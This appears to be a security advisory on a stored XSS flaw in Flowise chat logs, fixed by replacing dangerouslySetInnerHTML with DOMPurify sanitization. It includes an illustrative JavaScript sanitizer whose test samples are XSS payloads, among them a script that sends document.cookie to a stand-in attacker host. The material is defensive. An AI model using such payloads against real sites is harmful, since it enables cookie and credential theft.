The vulnerability is a stored Cross-Site Scripting (XSS) issue in the Flowise application, specifically in how it stores and later displays user-provided content in chat logs and node execution details. The root cause is the use of React's dangerouslySetInnerHTML property in several components to render HTML that an attacker can control, for example through a chat message. Because the content is stored, the payload fires not when it is submitted but later, in the browser of whoever opens the log. The PoC demonstrates that an attacker can inject <form> and <input> tags to create interactive elements that, when an administrator clicks them, execute malicious JavaScript to steal credentials or perform other unauthorized actions with the administrator's privileges.
Investigation of the fixing commit 9a06a85a8ddcbaeca1342827a5fea9087a587d97 confirms this analysis. The patch systematically replaces instances of dangerouslySetInnerHTML across several React components (ViewMessagesDialog, NodeExecutionDetails, ChatMessage, and JSONViewer) with a newly introduced SafeHTML component. This component runs the HTML through the DOMPurify library before rendering, explicitly forbidding dangerous tags such as <form>, <input>, and <script>, and event-handler attributes such as onerror and onclick. Because sanitization happens at render time rather than at storage time, messages that were stored before the upgrade are also neutralized when they are displayed, so the patch mitigates the XSS vulnerability without a data migration.
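The following is an added illustration of the sanitization policy the patch describes; it is not Flowise's SafeHTML component and it is not DOMPurify. To run without dependencies it reimplements the policy as a small allowlist sanitizer: only a fixed set of harmless elements and attributes survive, so <form>, <input> and <script> are removed, every on* handler is dropped, and javascript: URLs are rejected. The element and attribute lists, the helper names and the sample payloads are all constructed for this example and are not taken from the Flowise code base. In production the library call this stands in for is DOMPurify.sanitize with FORBID_TAGS and FORBID_ATTR, which is what the page says the fix uses; the exact option lists in the Flowise component are not reproduced here.

```javascript
// Added illustration, not Flowise's SafeHTML component and not DOMPurify.
// It applies the policy the patch describes (allowlist of harmless markup,
// with <form>, <input>, <script> and on* handlers rejected) without
// dependencies so it can run stand-alone. In production, use DOMPurify.

// Elements a chat UI legitimately needs (constructed list). Anything else is
// dropped, which covers the <form>, <input> and <script> tags in the advisory.
const ALLOWED_TAGS = new Set([
  'p', 'br', 'b', 'i', 'em', 'strong', 'code', 'pre', 'ul', 'ol', 'li',
  'a', 'span', 'img',
]);
// Attributes kept per element (constructed list). Any attribute not listed is
// removed, so every on* event handler (onclick, onerror, ...) disappears.
const ALLOWED_ATTRS = {
  a: new Set(['href', 'title']),
  img: new Set(['src', 'alt']),
  span: new Set(['class']),
  code: new Set(['class']),
};
// Elements whose body is code rather than prose, so the body is dropped too.
const DROP_CONTENT = new Set(['script', 'style']);

const TAG_RE = /<\/?([a-zA-Z][\w:-]*)((?:\s+[^\s=>\/]+(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s"'>]+))?)*)\s*\/?>/g;
const ATTR_RE = /([^\s=\/>]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;

function escapeText(text) {
  return text.replace(/</g, '&lt;').replace(/>/g, '&gt;');
}

function escapeAttr(value) {
  return value.replace(/&/g, '&amp;').replace(/"/g, '&quot;')
    .replace(/</g, '&lt;').replace(/>/g, '&gt;');
}

// Reject URLs whose scheme is not http, https or mailto. Control characters
// are stripped first because browsers ignore them inside a scheme, so
// "java\tscript:" would otherwise slip through as a relative URL.
function isSafeUrl(value) {
  const cleaned = value.replace(/[\u0000-\u0020]/g, '').toLowerCase();
  const scheme = cleaned.match(/^([a-z][a-z0-9+.-]*):/);
  return scheme === null || ['http', 'https', 'mailto'].includes(scheme[1]);
}

function sanitizeAttrs(tag, rawAttrs) {
  const allowed = ALLOWED_ATTRS[tag];
  if (!allowed) return '';
  let out = '';
  for (const m of rawAttrs.matchAll(ATTR_RE)) {
    const name = m[1].toLowerCase();
    const value = m[2] ?? m[3] ?? m[4] ?? '';
    if (!allowed.has(name)) continue;                                         // onclick, onerror, style, ...
    if ((name === 'href' || name === 'src') && !isSafeUrl(value)) continue;   // javascript:, data:, ...
    out += ` ${name}="${escapeAttr(value)}"`;
  }
  return out;
}

function sanitizeHtml(html) {
  let out = '';
  let last = 0;
  let dropping = null; // name of the DROP_CONTENT element we are inside, if any
  for (const m of html.matchAll(TAG_RE)) {
    const raw = m[0];
    const tag = m[1].toLowerCase();
    const closing = raw.startsWith('</');
    if (dropping === null) out += escapeText(html.slice(last, m.index));
    last = m.index + raw.length;
    if (dropping !== null) {
      if (closing && tag === dropping) dropping = null;
      continue;
    }
    if (!ALLOWED_TAGS.has(tag)) {
      // Forbidden element: the tag goes, its text content stays (as DOMPurify
      // does by default), except for script-like elements.
      if (!closing && DROP_CONTENT.has(tag) && !raw.endsWith('/>')) dropping = tag;
      continue;
    }
    out += closing ? `</${tag}>` : `<${tag}${sanitizeAttrs(tag, m[2])}>`;
  }
  if (dropping === null) out += escapeText(html.slice(last));
  return out;
}

// Constructed payloads of the kind the advisory describes, plus benign markup.
const SAMPLES = {
  phishingForm: '<form action="https://attacker.example/steal"><input name="password" type="password"><input type="submit" value="Re-authenticate"></form>',
  imgOnError: '<img src="x" onerror="alert(document.cookie)">',
  jsHref: '<a href="javascript:alert(1)" onclick="steal()">click</a>',
  script: "<script>fetch('https://attacker.example/?c=' + document.cookie)</script>Hello",
  benign: 'Hello <b>bold</b> & <i>1 < 2</i>',
};

// Returns { sampleName: sanitizedHtml } for every sample above.
function sanitizeSamples() {
  return Object.fromEntries(Object.entries(SAMPLES).map(([k, v]) => [k, sanitizeHtml(v)]));
}

for (const [name, result] of Object.entries(sanitizeSamples())) {
  console.log(name, '=>', JSON.stringify(result));
}
```

The phishing form collapses to an empty string, the onerror and onclick handlers and the javascript: href are stripped while the harmless <img> and <a> survive, the script element is removed together with its body, and ordinary formatting is untouched. A hand-rolled sanitizer like this is only for reading; mutation-XSS and parser-differential bypasses are exactly why the patch delegates to DOMPurify rather than filtering tags itself.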
| Package Name | Ecosystem | Vulnerable Versions | First Patched Version |
|---|---|---|---|
| flowise | npm | < 3.0.5 | 3.0.5 |